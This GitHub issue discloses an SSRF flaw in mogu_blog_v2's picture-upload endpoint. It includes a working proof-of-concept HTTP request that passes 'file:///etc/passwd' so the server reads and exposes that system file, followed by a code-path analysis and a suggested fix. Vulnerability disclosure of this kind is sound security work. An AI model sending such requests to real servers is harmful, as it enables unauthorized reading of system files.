Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞(mogu_blog_v2-FileRestApi#uploadPicsByUrl has a SSRF vulnerability) #97

Open
c3p0ooo-Yiqiyin opened this issue Mar 30, 2023 · 0 comments

Comments

@c3p0ooo-Yiqiyin
Copy link

1、复现详情(Reproduction details)

构造BurpSuite请求报文,利用file协议读取文件/etc/passwd中的内容,写入到图片中:
Construct a BurpSuite request message, use the file protocol to read the contents of the /etc/passwd file, and write it into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
	"token":"asdf",
        "adminUid":"asdf",
        "sortName":"admin",
        "projectName":"blog",
        "urlList":[
                "file:///etc/passwd"]
}

image

访问图片地址:http://you-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg

Visit image address: http://your-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg
image

2、底层分析(Bottom-up analysis)

入口点:
Entrance point:
FileRestApi#uploadPicsByUrl
image

进入uploadPictureByUrl()方法:
传入的fileV0为springboot前端传入的参数自动装配,从fileV0中取出urlList
Enter the uploadPictureByUrl() method:
The incoming fileV0 is the parameter automatically wired by the Spring Boot frontend. Extract urlList from fileV0
image

遍历urlList并传入uploadPictureByUrl()方法中,中间未作任何过滤:
Traverse urlList and pass it into the uploadPictureByUrl() method without any filtering in between:
image

更进uploadPictureByUrl方法:
uploadPictureByUrl方法中也未作任何过滤,直接传入URL类中
Further improve the uploadPictureByUrl method:
no filtering is done in the uploadPictureByUrl method, and the URL is directly passed in
image

调用openConnection方法后,获取数据流写入输出流中:
After calling the openConnection method, get the data stream and write it to the output stream:
image

文件写入的路径(文件输出流):
The path for writing the file (output stream):
image

3、修复方案(Repair plan)

(1)建议使用HttpURLConnection类,替代Url类,并对请求的ip地址进行判断,过滤掉内网ip
(1)Suggest using the HttpURLConnection class instead of the Url class, and filtering out intranet IP addresses by checking the requested IP address

@c3p0ooo-Yiqiyin c3p0ooo-Yiqiyin changed the title mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞 mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞(mogu_blog_v2-FileRestApi#uploadPicsByUrl has a SSRF vulnerability) Mar 30, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant